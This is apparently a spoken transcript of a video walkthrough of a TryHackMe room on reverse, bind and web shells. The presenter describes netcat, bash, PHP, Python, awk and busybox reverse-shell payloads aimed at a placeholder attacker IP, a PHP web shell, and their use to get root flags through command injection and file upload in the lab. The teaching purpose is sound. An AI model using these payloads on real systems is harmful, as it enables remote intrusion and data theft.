Hey everybody, welcome back to my channel. This is WireDogSec, back with another video for you guys. Today's video, we are back in TryHackMe. This is the Cybersecurity 101 learning path. This is the Offensive Security Tooling module. This is the Shells overview. Learn about the different types of shells. Hopefully, you're all having an awesome day today and ready to learn something. So let's go ahead and dive into it. Task 1, Room Introduction. Shells in cybersecurity are widely used by attackers to remotely control systems, making them an important part of the attack chain. In this room, we'll explore different shells used in offensive security, the differences between them, and their use cases. This knowledge can help enhance penetration testing and exploitation skills, and also help us understand how to detect when a remote shell is being used by an attacker. Within our organizations, we got learning objectives. In this room, we'll cover the following learning objectives: understand shells in offensive security, set up and use reverse and bind shells, deploy web shells, room prerequisites, and understanding of the following topics recommended before starting the room: basic understanding of networking, fundamental knowledge of web application security, basic command line proficiency, familiarity with scripting languages like Bash, Python, or PHP. Caveats: the use of Metasploit or other frameworks that generate or interact with shells has been intentionally left behind from this room. This is to focus on understanding how shells work without the use or assistance of a tool to either set up or generate a shell. Also, for this room, we'll use Linux OS for all the examples. That's good to know. And it says starting the machine, so click the button at the top to start the attack machine, attack box. You can see here it's already running. And also the target machine is running as well. As you can see, shell overview demo, and then you got the attack box down there. So this one's done. Task number 2, shell overview. What is a shell? A shell is software that allows a user to interact with an OS. It can be a graphical interface, but it is usually a command line interface, and this will depend on the operating system running on the target system. In cybersecurity, it commonly refers to a specific shell session an attacker uses when assessing a compromised system, allowing them to run commands and execute software. This will allow attackers to execute several activities, some of which are described below. Remote system control allows the attacker to execute commands or software remotely in the target system. Privilege escalation: if initial access through a shell is limited or restricted, attackers can explore ways to escalate privileges to more elevated or administrative access. Data exfiltration: once attackers have access to execute commands through an obtained shell, they can explore the system to read and copy sensitive data from it. Persistence and maintenance access: once shell access is obtained, attackers can create access through users and credentials or copy backdoor software to maintain access to the target system for later usage. Post-exploitation activities: after access to a shell is granted, attackers can perform a wide range of post-exploitation activities, such as deploying malware, creating hidden accounts, and deleting information. Access other systems on the network. Depending on the attacker's intentions, the obtained shell can be just an initial access point. The goal can be to hop through the network to a different target using the obtained shell as a pivot to different points in the compromised system. This is also known as pivoting. All the shells we will describe in the next task can help to achieve different limitations of the attacks described above. Okay, what is the command line interface that allows users to interact with an operating system? Remember, that's shell, as we read about. What process involves using a compromised system as a launching pad to another, to attack other machines and network? That's pivoting, as we just saw up here. This is also known as pivoting. And what is a common activity attackers perform after obtaining shell access to escalate their privileges? Well, that's privilege escalation, as we saw up here under these items here. So privilege escalation, right here, the second one. All right. And task number 3, reverse shell. A reverse shell, sometimes referred to as a connect back shell, is one of the most popular techniques for gaining access to a system in cyber attacks. The connections initiate from the target system to the attacker's machine, which can help avoid detection from network firewalls and other security appliances. How reverse shells work: set up a netcat or NC listener. Let's now understand how reverse shell works in a practice scenario using the tool netcat. This utility supports multiple OSs and allows reading and writing through a network. As mentioned above, a reverse shell will connect back to the attacker's machine. This machine will be Waiting for a connection. So let's use netcat to listen to a connection using the following command. So they have netcat or nc-lvnp443, and we can go ahead and set this listener up here like so. So you have NC and you have the flags here or options here, then you have the port that you want to listen on, and it's listening on 443. The command above uses the -L option to indicate netcat to listen or wait for a connection. The -V option enables verbose mode. The -N option prevents the connection from using DNS for lookup, so it will not resolve any host name. It will use an IP address. Finally, the -P flag indicates the port that will be used to wait for the connection in the above port 443. Any port can be used to wait for a connection, but attackers and pen testers tend to use known ports used by other applications like 53, 80, 80, 80, 443, 139, or 445. This is to blend in the reverse shell with legitimate traffic and avoid detection by security appliances. Gaining reverse shell access. Once we have our listener set, the attacker should execute what is known as a reverse shell payload. This payload usually abuses the vulnerability or unauthorized access granted by the attacker and executes a command that will expose the shell through the network. There's a variety of payloads that will depend on the tools and OS of the compromised system. You can explore some of them here, which is Pentest Monkey Reverse Shell Cheat Sheet. As an example, let's analyze an example payload named a pipe reverse shell, also shown below, and looks like a pretty long one here. Explanation of the payload, rm-f temp-f. This command removes any existing name pipe file located at temp-f. This ensures that the script can create a new name pipe without conflicts. mk FIFO temp-f. This command creates a name pipe or FIFO first in first out. At temp-f, name pipes allow for two-way communication between processes. In the context, it acts as a conduit or input and output. Cat temp-f. This command reads the data from the name pipe. It waits for the input that can be sent through the pipe. And pipe bash dash I 2 greater than and then and or ampersand and 1. This output of cat is piped into the shell instance bash dash a or I, which allows the attacker to execute commands interactively. The 2 greater than and 1 redirects standard error to standard output, ensuring that error messages are sent back to the attacker. And then pipe NC attacker IP address, or yeah, and attacker port to greater than and then temp-f. This part pipes the shell's output through NC netcat to the attacker's IP address, attacker IP on the attacker's port, the attacker port to greater than temp-f. This is the final part that sends the output of the command back into the name pipe, allowing for bidirectional communication. The payload above can expose the shell bash through the network to the desired listener. Attacker receives the shell. Once the above payload is executed, the attacker will receive the reverse shell as shown below, allowing them to execute commands as if they were logged into a regular terminal in the OS. Attacker output receiving the shell. So they have the listener fired up here, and then it connected back to that listener. It says to run a command as administrator, user root, yada yada yada. The output above shows the connection coming from 10, 10, 13, 37, which is the IP address of the compromised target. So uh, let's see, I assume they want us to go ahead and do this. So let's go ahead and try it out real quick. And I'm gonna open up a new tab here, paste this in. All right, and then we are going to place this 443 and then our IP address here, 137. I'm not sure if this is gonna work or not. But, oh, there we go. So let's do who am I? Awesome. Host name. Cool. IPA. All right, there we go. What type of shell allows an attacker to execute commands remotely after the target connects back? Well, we just did that. So reverse shell. What tool is commonly used to set up a listener for reverse shell? Well, netcat, as we discussed. You can use NC for that. Let's continue on to task number 4. We're going to talk about bind shell. As the name indicates, a bind shell will bind a port on the compromised system and listen for a connection. When this occurs, or when this connection occurs, it exposes the shell session so that the attacker can execute commands remotely. This method can be used when the compromised target does not allow outgoing connections, but it tends to be less popular since it needs to remain active and listen for connections, which can lead to detection. How bind shells work. Setting up a bind shell on the target. Let's create a bind shell. In this case, the attacker can use a command like the one below. So let's just go ahead and get this set up here. Let me go ahead and kill this here. All right, I should have killed this as well. All right, cool. So let's go ahead and paste this over. Um, okay. Let's see. Explanation of the payload. The first part here says this command removes any existing name pipe to file located at temp F. This ensures that the script can create a new name pipe without conflicts. And then the second part here says this command creates a name pipe or FIFO at temp F. Name pipes allow for two-way communication between processes. In this context, it acts as a conduit for input-output. And then you have the cat temp F. This command reads the data from the name pipe. It waits for input that can be sent through the pipe. And they have pipe dash dash I 2 greater than and 1. This output of cat is piped to a shell instance bash dash I, which allows the attacker to execute commands interactively. The 2 greater than and 1 redirects standard error to standard output, ensuring error messages are returned to the attacker. Then you have pipe nc-l 0.0.0.0 8080 starts netcat in listen mode -l on all interfaces on 0.0.0.0 and port 8080. This shell expose will be exposed to the attacker once they connect to the support. And then you have the greater than temp F. And the final part sends the attacker's command back to the name pipe, allowing bidirectional communication. The command above will listen for incoming connections and expose a bash shell. We need to note that ports below 1024 will require netcat to be executed with elevated privileges. In this case, using port 8080 will avoid this. Terminal on the target machine bind shell setup. So we've already typed this or copy and paste this over. Once the command is executed, it will wait for an incoming connection as shown below or shown above. Sorry. Attacker connects to the bind shell. Now that the attacker or the target machine is waiting for incoming connections, we can use netcat again with the following command. Explanation of the command. NC invokes netcat, which establishes the connection to the target -n, disables DNS resolution, allowing netcat to operate faster and avoid unnecessary lookups. -v verbose mode provides detailed um, output of the connection process, such as when the connection established target IP address of the target machine, and where the bind shell is running. 8080 the ports on which the bind shell listens. Okay, so they have the attacker connecting with netcat to that. And let's go ahead and do that here. Okay. It says failed, no route to the host. Okay, let's try this again. Now I flipped over to the shell overview demo v1 machine. As you can see here, it says Ubuntu at tryhackme.com. I copied and pasted what we had up above here to get the bind shell set up. Now going back over to the tag box, I'm going to connect to that. All right, as you can see there, there is the target IP, and there's the port. So let's go ahead and connect to it. It says it's succeeded. Now I am Ubuntu at tryhackme.com. So you can do some things in here like this, things like that, IPA, host name, stuff like that. You can do ls. You can do all kinds of things here. Okay, so you get it. Now we're connected to that machine. What type of shell opens a specific port on the target machine for incoming connections from the attacker? Well, that's a bind shell, as we just did. Listening below which port number requires root access or privileged permissions. That's 1024, as we read above here, that you need to be root. In order to do that, we need to note that ports below 1024 require netcat to be executed with elevated privileges. All right, so let's continue on to task number 5, shell listeners, and let's see what they're talking about here. As we learned in previous tasks, A reverse shell will connect from the compromised target to the attacker's machine. A utility like netcat will handle the connection and allow the attacker to interact with the exposed shell, but netcat is not the only utility that allows us to do that. Let's explore some tools that can be used as listeners to interact with an incoming shell. RL-wrap. It is a small utility that uses the um, GNU or GNU read line library to provide editing, keyboard, and history. Usage example, enhancing a netcat shell with RL wrap. You can see they're doing RL wrap, then netcat or NC, then dash LVNP 443. So yeah, they put that beforehand, and I guess they want us to try this out. Hey everybody, welcome back to my channel. Be sure to hit the like button, comment, and subscribe. Once you subscribe, be sure to hit that notification bell. All right, so you know every time I post a new video. As you can see here, most people that view my videos, view my channel, are not subscribed. Now, if you do subscribe, it will help me get into the YouTube algorithm so that we can continue to grow our glorious community here. As always, thank you all for taking the time to watch. Have a nice day and enjoy the video. Okay, now as you can see here, I am on my attacker machine and I did the RL wrap NC-LVNP 443 and I connected to this from the victim machine, which is this one here. And I used what we did earlier with the name pipes and such. Okay, so I put that in there. Now I connect it back to my attacker machine here, so we can go in and do host name, who am I? Okay, there we go. Now let's continue on to NCAT. This NCAT is an improved version of netcat distributed by the Nmap project. It provides extra features like encryption, SSL. Usage example, listening for reverse shells. All right, so let's go and do the same thing here. Let's go ahead and quit all this, clear it out, and then ncat, and then this time it's going to be on port 4444. I guess it's not installed on this box. Okay, I guess we can't do that then. All right, well, we get the gist of it. It's like netcat, but better from what we can read here. Usage example, listening on reverse shells, SSL. All right, they did ncat dash dash SSL. And then same thing, LVNP 4444. The dash SSL option enables SSL encryption for the listener. Let's see, SOCAT. Actually, let me see if I can install this real quick. Okay. Now, if this works, we can go ahead and try this out. But let's go ahead and read about SOCAT. It is a utility that allows you to create a socket connection between two data sources, in this case, two different hosts. Example usage here for the reverse shell SOCAT -d-g TCP listen 443 SD out. You can see the rest here. I guess that's, yeah. I'm assuming this is the port, and then it says end listening on AF equals yada yada yada. The command above use the -d option to enable verbose output. Using it again, -d will increase the verbosity of the commands. The TCP-listen 443 option creates a TCP listener on port 443, establishing a server socket for incoming connections. Finally, the STD out option directs any incoming data to the terminal. Okay. Awesome. So let's go ahead and do this real quick. Now that we have ncat installed. So there we go. Now it's listening. Let's flip back over to our demo box. Okay. And let's go ahead and clear all this out. Up arrow. And I need to change the port. Okay. Now let's see if it worked. Flip back over to attack box. Okay. It looks like it's good to go. So we're going to do the same thing here. Host name. Who am I? Okay. Looks good to go. IPA. Okay. Awesome. Now let's see if we can do, I guess this SOCAT. I'm assuming this isn't installed either. So let's go and clear this out and let's find out. Oh, awesome. Okay, I guess it is installed. Cool. That solves that problem. Let's go ahead and I guess copy and paste this over. Okay. Awesome. And we're going to do the same thing, except we're going to switch the port back to 443. So I'm going to up arrow again. Okay, now let's connect back to the attack box, take a peek, And looks like it's good to go here. Let's do it. Host name. Awesome. ID. Who am I? Cool. IPA. All that good stuff here. So now that we got the gist of everything here, let's get to these questions. Which flexible networking tool allows you to create a socket connection between two data sources? Remember, a socket connection, so that's going to be SOCAT. Which command line utility provides read line, style editing, and command history for programs that lack it, enhancing the interaction with a shell listener? Remember, you can use the RL wrap as discussed up here. Okay, features like arrow keys and history for better interaction. What is the improved version of Netcat distributed with the Nmap project that offers additional features like SSL support for listening to encrypted shells? Well, that's going to be NCAT as we read about here. All right, so it's like Netcat on steroids. Task number 6, shell payloads. A shell payload can be a command or script that exposes the shell to an incoming connection in case of a bind shell or send a connection to the case of a or in case of a reverse shell. Let's explore some of these payloads that can be used in the Linux OS to expose the shell through the most popular reverse shell. Bash, normal bash, reverse shell, zip bash dash I, and then you have the greater than ampersand dev TCP attacker IP 443 greater than ampersand 1. This reverse shell initiates an interactive bash shell that redirects input and output through a TCP connection to the attacker's IP, or on port 443, the greater than ampersand operator combines both standard output and standard error. All right, so you go ahead and try this out. Let's go ahead and kill this, crawl this out, and I'm just going to copy and paste this over, replace some things here. So we need to place our attacker IP. All right, so if you want to use those, I guess you can try it out and see if it works. Says connection refused. I wonder if we need to also kill this first. Or maybe, okay, I know what I'm doing here. Okay, let me go ahead and copy this here. And I need to set up a listener. That is what I'm doing wrong here. All right. All right, so I need to set up a listener. Let's just do, let's see if it works with Netcat here. And now I'm going to paste this over. What happened? That's weird. They didn't paste it properly. All right, let's do it this way then. Okay. Now I'm gonna replace the. Oh, okay, whatever. Okay, so let's go back over. Okay. Here we go. Awesome. Who am I? Ubuntu, Ubuntu. Okay. Looks like it worked. Awesome. Bash read line reverse shell. So you have a different one here. It looks a little bit longer. Exec 5 dev TCP attacker IP. Let's go ahead and try this one as well. It says this reverse shell creates a new file descriptor, 5 in this case, and connects to a TCP socket. It will read and execute commands from the socket, sending the output back through the same socket. Okay, so let's go ahead and do that. Let's go ahead and quit out of this. Clear everything out. And then we need, of course, fix the placeholder for the IP. I'm getting myself confused again. Sorry about that. Let's go ahead and start the listener on this, and I need to flip back over to the demo machine. Okay, so we'll clear all this stuff out. Then this is where I need to put that information over here. So I'm going to go ahead and copy this again. Okay, and now we need to fix the placeholder of the attacker IP. Well, it's 10 dot 10 dot, I think it's 137. Nope, 7.137. Okay, 7.137. Okay, now let's go ahead and check it. And looks like it was good. So who am I? Yep, ID, host name. Awesome. All right, looks good to go for that one. Bash with file descriptor 196 verse shell. All right, so go ahead and try these yourself, and then we're just going to continue to read on for the sake of time here, but feel free to try these out yourself and get familiar with them. This reverse shell uses a file descriptor 196 in this case to establish a TCP connection. It allows the shell to read commands from the network and send output back through the same connection. Bash with file descriptor 5 reverse shell, and it looks like this. So similar to the first example, this command opens a shell bash -I, but it uses file descriptor 5 for input and output, enabling an interactive session over TCP connection. PHP reverse shell using the exec function. So you got PHP-R, and then inside of here you have the sock equals F socket open attacker IP, comma 443 exec. Then you see the rest there. This reverse shell creates a socket connection to the attacker's IP on port 443 and uses the exec function to execute a shell, redirecting standard input and output. PHP reverse shell using shell underscore exec function. And it looks like this here, PHP-R. And you can see the rest here. So similar to the previous command, but uses the shell underscore exec function, which is here. PHP reverse shell using the system function. All right, it says the reverse shell employs the system function, which executes the command and outputs the result to the browser. All right, and you can see that here, system. You have PHP reverse shell using the pass-through function right here. The pass-through function executes a command and sends raw output back to the browser. This is useful when working with binary data. PHP reverse shell using the pop open function right here. Says this reverse shell uses pop open to open a process file pointer, allowing the shell to be executed. Python reverse shell by exporting environment variables here, and this is what it looks like. All right, let me scroll over a little bit. Says this reverse shell sets the remote host and port as environment variables, creates a socket connection, and duplicates the socket file descriptor for standard input output. Python reverse shell using the subprocess module. All right, and this is what it looks like here. This reverse shell uses the subprocess module to spawn a shell and set up a similar environment as the Python reverse shell by exporting environment variables command. Short Python reverse shell. This reverse shell creates a socket S and connects to the attacker and redirects standard input output and error to the socket using the os dot dupe2 and then open and close parentheses. Others here, you have one here that says this, or using telnet, it says this reverse shell creates a named pipe using make FIFO and connects to the attacker via telnet on a IP and port. You have awk. This reverse shell uses awk built-in TCP capabilities to connect to the attacker IP port. It reads commands from the attacker and executes them. Then it sends the results back over the same TCP connection. You have busybox here, busybox NC attacker IP 443-E SH. This busybox reverse shell uses netcat NC to connect to the attacker IP. Once connected, it executes bin shell, exposing the command line to the attacker. Awesome. So there's quite a few here, so make sure you're taking notes. All right, I've only used a handful of these probably, and it's probably good to know how to use at least more than one in case one of these does not work in your CTF environment, or maybe in your test environment, or maybe in the real world, wherever you're testing or conducting your operations. Question time. Which Python module is commonly used for managing shell commands and establishing reversed shell connections in the security assessments? Well, that's going to be subprocess, right, as we just talked about up here. Okay, to spawn a shell and set up similar environment as the Python reverse shell by exporting environment variables commands. Let's see. What shell payload method is a common scripting language? Uses the exec shell underscore exec cetera, et cetera. Well, that's going to be PHP, right? PHP had quite a few of them that we just went over here. So we got system, pass through, pop open, etc. Which scripting language can use a reverse shell by exporting environments, variables, and creating a socket connection? Python. All right, so as we discussed here in the several different Python ones here, you can go through and reread that. So socket file, descriptor, standard, input, output. All right, so that's it for that task. Task number 7, talk about web shells. A web shell is a script written in a language supported by a compromised web server that executes commands through the web server itself. A web shell is usually a file containing the code that executes commands and handles files. It can be hidden within a compromised web application or service, making it difficult to detect and very popular among attackers. Web shells can be written in several languages supported by web browsers like PHP, ASP, JSP, and even some CGI scripts. Example PHP web shell. Let's look at an example PHP web shell to understand how this process works. Okay, this is what one looks like here. The above shell can be saved into a PHP or to a file with the PHP extension like shell.php and then uploaded into the web server by the attacker by exploiting vulnerabilities such as unrestricted file upload, file inclusion, command injection, among others, or by gaining unauthorized access to it. After the web shell is deployed in the server, it can be accessed through the URL where the web shell is hosted. In this example, you got the victim.com upload to shell.php. As we observed from the code shell.php, we need to get or provide a get method and the value of the variable cmd, which should contain the command the attacker wants to execute. For example, if we want to execute the command who am I, the request to the URL will be the following here. So you have the victim.com uploads shell.php and you have command equals who am I. It says the above will execute the command who am I and display the results in the web browser. Existing web shells available online. The power of supported languages by the web service can result in web shells with lots of functionality and avoid detection at the same time. Let's explore some of the most popular web shells that can be found online. You have Pony Shell, a minimalistic single file PHP web shell that allows remote command execution. That's pretty neat. I don't think I've seen this one before. You have whatever this is, B374K um, shell, a more feature-rich PHP shell with the file management and command execution among others. So this is what it looks like here. Okay. C99 shell, a well-known and robust PHP shell with the extensive functionality, and looks pretty neat here. You can find more web shells at the following here, r57shell.net and dex.php. So check that out if you're interested in learning about more shells that you could possibly use. What vulnerability type allows attackers to upload a malicious script by failing to restrict file types? Well, that's going to be unrestricted file types, as discussed up here. And there's a link here, so you can check that out if you're unfamiliar with those. And it takes you to a TryHackMe room, or you can just use Google. What is a malicious script uploaded to a vulnerable web application to gain unauthorized access? Well, we know that's a web shell because what we've been reading about and taking a look at. Task number 8, practical task. Okay, now that we have learned about the different types of shells or reverse shells, let's test our knowledge with a practical exercise. And let's get the flag in the format THM, open and close, curly braces, from the vulnerable web server. Click on the Start Machine button at the challenge where you did that. After that, it will be accessible following URL. So we got 10.10.133.226, 8080, 8081, 8082. Okay, so this one says command injection, unrestricted file upload. You can access the above using the attack box, which will display on screen, or you can use your own VPN. All right, so let's go ahead and find the flag. It says using a reverse or bind shell, exploit the command injection vulnerability to get a shell. What is the content of the flag saved in the root directory? Using a web shell, exploit the unrestricted file upload vulnerability and get a shell. What is the content of the flag saved in the root directory? So go ahead and try this out yourself, then come back to the video and we will continue on. Let's go ahead and take a look here. Hopefully you're able to figure this out yourself, but we're going to go through it right now. All right, now, as you can see here, we have the reverse bind shell task, and then we have the web shell task. So let's go ahead and go to the command injection. All right, it says, for example, try out hello.txt. As you can see, it's firing off something here. All right, now we're going to need to put our code into this here. So if we go back to the reverse shell here, we need to set up our listener. So let's go ahead and do that. So I'm going to copy and paste this over like so. Listener's running. Let's fire this back up inside of Firefox here. And we're going to use this pipe reverse shell. So I'm going to copy this, and then of course we're going to replace this attacker IP and port with the correct information. All right, so the port's 443, 443, and I have an extra number in there, so 443. And my IP of my attack box is going to be 10.10.31.192. Now don't forget to kill the machine that was up here, or in task one, and then start the one that's in this task. Otherwise, it's not going to work. Okay, so let's go ahead and fire this off. It's ready to go. Go back over to our reverse shell. All right, it says that I'm connected. ID, who am I? Awesome. So we need to find this flag in the root directory. And to do that, let's go ahead and do ls root. Okay, there's the flag. So let's go ahead and clear this. Let's try that again. I forgot you can't up arrow in this. I can't do that either. All right, whatever. So we're going to do a ls root and then flag.txt. Oh, sorry, cat flag.txt. There we go. So we got that one. Next one is going to be the web shell. Now what we're going to do here is go back to where we were talking about web shell here, and we're going to use this. So we're going to copy this, navigate over. Let's kill this session so it doesn't get in the way of anything. Okay, clear all this out, and we're going to do a nano shell.php. Okay, and we're going to plug this in here. Hit Control X. Yes, we want to save it. All right, there's our file, shell.php. Okay, now that's ready to go. Minimize this, go back over, kill this. And it says data scientist position, upload your CV. All right, so we need to browse file, and we're going to select our PHP file of shell. Got that, and we're going to upload it. Now it says here we need to navigate and use this here. Okay, so we're going to take this uploads, /uploads, and we're going to do command equals to my. We want to leave that in there because we want to test this out, right? So we are going to replace all this stuff here with this. Okay, see how it's working. It shows who am I. Now we go in and we can do the same thing here. Let's do a ls. Okay, use a %20, so that's the URL encoded space in here. All right, and we're gonna do an ls %20, and then we're gonna do the /, which is gonna be the root. You can see flags right there. We're gonna do the same thing, except this time we're gonna use the cat to cat that flag. So I'm gonna use cat and then %20, and we know the location is gonna be / or root, and then we know the name is gonna be flag.txt. Hit enter. There we go. There's the flag for that last one there for the practical task. Now there's other ways to do this. You can probably do this with some fancy shell or something like that, but I just did it with the shell, the web shell that we had learned about in the module. Anyway, so that completes that one. Task number 9. Let's go ahead and wrap it up with the conclusion. In this room, we learned about reverse shells, bind shells, and web shells, how they are critical for attackers, penetration testers, and defenders, and how to identify them. Reverse shells establish a connection from a compromised or victim machine back to an attacker's system. Bind shells, on the other hand, listen for incoming connections on a compromised machine. And web shells offer attackers a unique avenue for exploiting vulnerabilities in web applications. Understanding shells is critical for security professionals to either perform penetration testing exercises or to identify and defend systems. I have successfully completed this room, and I now understand how reverse shells, bind shells, and web shells work. Awesome. Hopefully you all found this video of value. If you enjoyed the video, be sure to hit that like button. If you're new here, hit the subscribe button with the notification bell so you know every time I post to the channel. Also, hit the comment section below on your thoughts and opinions on the information discussed in the video. As always, thank you all for taking the time to watch my video. Have a nice day, and I will see you later.